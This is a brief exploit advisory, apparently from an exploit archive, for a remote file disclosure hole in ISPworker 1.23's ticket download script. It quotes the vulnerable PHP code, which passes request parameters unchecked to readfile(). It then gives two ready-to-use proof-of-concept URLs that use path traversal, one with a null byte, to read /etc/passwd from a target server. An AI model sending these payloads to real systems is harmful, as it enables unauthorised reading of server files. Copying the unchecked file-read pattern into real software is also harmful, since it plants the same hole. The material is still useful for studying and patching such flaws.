id: 10059
date: 12/01/2009
title: ISPworker <= 1.23 Remote File Disclosure exploit
author: cr4wl3r
cves: 

================================================
ISPworker <= 1.23 Remote File Disclosure exploit
================================================

########################################################################
 
#ISPworker <= 1.23 Remote File Disclosure exploit
 
#Download Script      :  http://www.ispware.de/_files/ispworker-1.23.tar.gz
 
#Dork                 :  die("lamers attempt");  :P
 
########################################################################
 
#
 
#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php
 
#
 
#       <?header('Content-type: '.$_REQUEST[type]);
 
#        header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');
 
#        readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);
 
#       ?>
 
#
 
#PoC  :  http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
 
#        http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd
 
#
 
########################################################################



#  0day.today [2023-03-27]  #